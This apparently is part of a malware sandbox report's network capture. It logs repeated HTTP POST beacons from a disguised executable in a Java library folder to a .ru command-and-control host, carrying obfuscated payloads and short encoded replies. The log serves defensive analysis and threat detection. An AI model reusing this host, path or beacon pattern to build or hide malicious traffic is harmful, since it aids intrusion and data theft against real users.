                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7821&min_rtt=1477&rtt_var=13242&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27953&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  82192.168.2.449914104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:10.043421030 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:10.400114059 CET1072OUTData Raw: 55 5f 58 57 5f 5d 51 5e 55 5a 54 59 51 52 55 53 58 5d 5c 5b 59 53 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XW_]Q^UZTYQRUSX]\[YSRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^?781$=5\)-('$..4+$Y"V'(->4Z?.#)<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:10.487409115 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:10.661891937 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9JoRBzgjN3u%2BWhrYQE2zsL6oxqusPxRIWKjTQFqJNczRBBUmHk5nJBWpBk7NdWTcsXHOp8zwfPDfizRy5%2FR9gBI2Efrf8dLG1Jm%2Fes%2FKfw6L90FGuvDLLps5cdUN%2FAEN18vXmf3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d1e497642db-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2334&min_rtt=1771&rtt_var=1790&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=232632&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  83192.168.2.449920104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:10.808171988 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:11.165872097 CET1072OUTData Raw: 55 57 58 55 5a 5b 51 59 55 5a 54 59 51 5c 55 5c 58 5d 5c 58 59 55 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXUZ[QYUZTYQ\U\X]\XYUR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?-X!+&1\(.3Y3&.<Y$<"Q'8,<=,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:11.305015087 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:11.559890032 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCzt2yLbp27QY4%2BkeV0WOA3dYAYPNok%2F1flUFLpOpNC3GOr3xtHjc2%2Fi%2BTx4fU4T6lUTG%2FYDpauCnaLKE04mpsRGzu2vebL5y9YcqfrcNjnC7M71OjaniloQyy3k8fBnjXTNqFOQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d235e0e438e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13410&min_rtt=9008&rtt_var=12182&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=33013&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  84192.168.2.449926104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:11.683334112 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:12.040586948 CET1072OUTData Raw: 55 53 58 50 5f 5a 54 5a 55 5a 54 59 51 58 55 57 58 53 5c 5c 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXP_ZTZUZTYQXUWXS\\YWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \+?>4;!&>")>43$.T:4_3?6U0</.Z?X;*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:12.181523085 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:12.439600945 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8126cVocQ%2BcEHGXiSAJzdDKS3QvQ3wRCIO3NyuHG7jrdshgbVoiDBneTupHsW%2B5oaPZCWP65jU6ANx4dhMQtVmXwuOExOleNxURjaRRvgVeXJGGsuhUiv1Gnpna8xBGTELYrOOM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d28df15efa3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3235&min_rtt=1976&rtt_var=3259&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=121151&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  85192.168.2.449933104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:12.559117079 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:12.915631056 CET1072OUTData Raw: 55 5f 58 5c 5f 5b 51 5e 55 5a 54 59 51 5e 55 5d 58 53 5c 5b 59 51 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_X\_[Q^UZTYQ^U]XS\[YQRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )/ 8%Y%1Z*$$:(^',>3,+Y-.8Z(=8(,#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:13.002176046 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:13.267893076 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LogtOrQtYKKtv8Y%2B5Ea3o%2FurBRgm7LjE9LrUGTUSeRPhXGgLF5NgOsmm%2FJfPB6j1Izzyyw23XBBuBf4dESaZaD18PfJhu17a96lqqFRV3kCjPaC7mxSEVV%2Bk6nkt7TgU8DQsuZUL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d2df8d84407-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2366&min_rtt=1720&rtt_var=1937&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=211870&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  86192.168.2.449941104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:13.403805017 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:13.759521961 CET1060OUTData Raw: 55 54 58 51 5a 5c 51 5a 55 5a 54 59 51 5b 55 55 58 53 5c 5e 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXQZ\QZUZTYQ[UUXS\^YRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+<!7]-X1.:>#[$'9,4%?53/0,='?#=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:13.879434109 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:14.139358997 CET798INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lthV9Z4qfepZzkHlL4HFubLdjj0ynRDyAdqHdg65Jw98dMi4qHc5GtV8QCcdUJ0d8GpeG7b8c0XVJqLfJ7oL0S04rZp6s8FNZWrHxl7OIj9IoqIwnsvBMpV1jIZvg0BWoZj6myFB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d337e116a50-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=2081&rtt_var=4139&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1404&delivery_rate=94084&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  87192.168.2.449947104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:14.297403097 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:14.649950981 CET1072OUTData Raw: 55 55 58 50 5a 56 51 5a 55 5a 54 59 51 5e 55 50 58 59 5c 54 59 54 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXPZVQZUZTYQ^UPXY\TYTR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+,-7*1-%Z)Z&4",$Y'?200,<),#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:14.740761995 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  88192.168.2.449950104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:14.782183886 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:15.134434938 CET1796OUTData Raw: 55 50 5d 54 5a 5b 54 59 55 5a 54 59 51 5f 55 53 58 5f 5c 5c 59 54 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]TZ[TYUZTYQ_USX_\\YTR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +/14;22:>Z372T.$<\'Y.&,0,>,[(-7(,#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:15.226138115 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:15.436764002 CET961INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1m69U%2F8GEPw%2Bkljqondm4JqigL13%2FVE8Gr95tl%2B78vcNe4i90JOvcEEoCh6StwnT17LJodO6Dg6a7W3MrszsBG8iJG%2FsE%2BFY%2Bet7aAYCKHFPRTYFSzBUcUeDWIgMFwRCYfFVNuBW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d3bddfe8c3f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2010&rtt_var=838&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=621276&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 55 27 38 34 05 28 10 00 11 2f 06 3c 0f 25 2c 3e 14 30 33 34 58 24 2e 31 59 2e 5e 34 13 3c 2b 30 06 25 29 3e 06 34 21 29 02 32 36 2e 5d 04 1d 26 04 3f 2a 2d 07 2b 59 25 5b 3e 1c 02 16 33 34 28 01 25 34 24 58 33 3d 03 02 20 31 38 0b 27 33 3c 56 28 17 38 00 26 2e 2d 0c 23 00 2e 57 0d 12 22 1c 25 10 17 55 3e 1f 0a 1e 21 2c 38 0b 30 01 24 0c 24 3c 0e 50 34 28 2a 54 3d 59 3b 03 22 37 39 12 27 39 2f 5f 36 07 21 58 36 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"U'84(/<%,>034X$.1Y.^4<+0%)>4!)26.]&?*-+Y%[>34(%4$X3= 18'3<V(8&.-#.W"%U>!,80$$<P4(*T=Y;"79'9/_6!X6#"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  89192.168.2.449953104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:14.924045086 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:15.275104046 CET1072OUTData Raw: 55 50 5d 54 5a 5b 51 55 55 5a 54 59 51 59 55 56 58 5c 5c 59 59 51 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]TZ[QUUZTYQYUVX\\YYQRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+?-#+%[&1*.'%-$X'/>W3,/,.+?-8W=,#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:15.365559101 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:15.627419949 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwh2mN2yt4RwwUyxeuIhv26NNaLpNe6aYNgqbZWYKDumFQNV1Mz51qCv1mG6XCKlxZw%2BSm3CRzBGUcRCwRm6oG4aixveWcRq6Dwh6yVFVwNf6tKNLnfiFs9PXlTnIYmgcdZQuQuB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d3cbfe27c8e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=1913&rtt_var=922&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=534407&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  90192.168.2.449960104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:15.763194084 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:16.118840933 CET1072OUTData Raw: 55 51 5d 50 5f 5c 51 5a 55 5a 54 59 51 5a 55 5c 58 5e 5c 5d 59 54 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]P_\QZUZTYQZU\X^\]YTRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (,541$=>*- 34.-4Y3Y"0;+(-#(<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:16.247865915 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:16.484397888 CET814INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHzJpD6%2Fd72KtYP5pvVIpd9F1sm%2F6TGZz8taTb03etQK8%2Fp%2BD1WLUR%2FzzL4mJkzIvZdr1%2F6mtA2M1nJFgxAMcTiz08cHva0p%2BVilc3RB8NT3mwzEMWKNMtq3HBTCnwzAGWZqeqv%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d422ef2440e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3909&min_rtt=1755&rtt_var=4966&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=76890&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  91192.168.2.449966104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
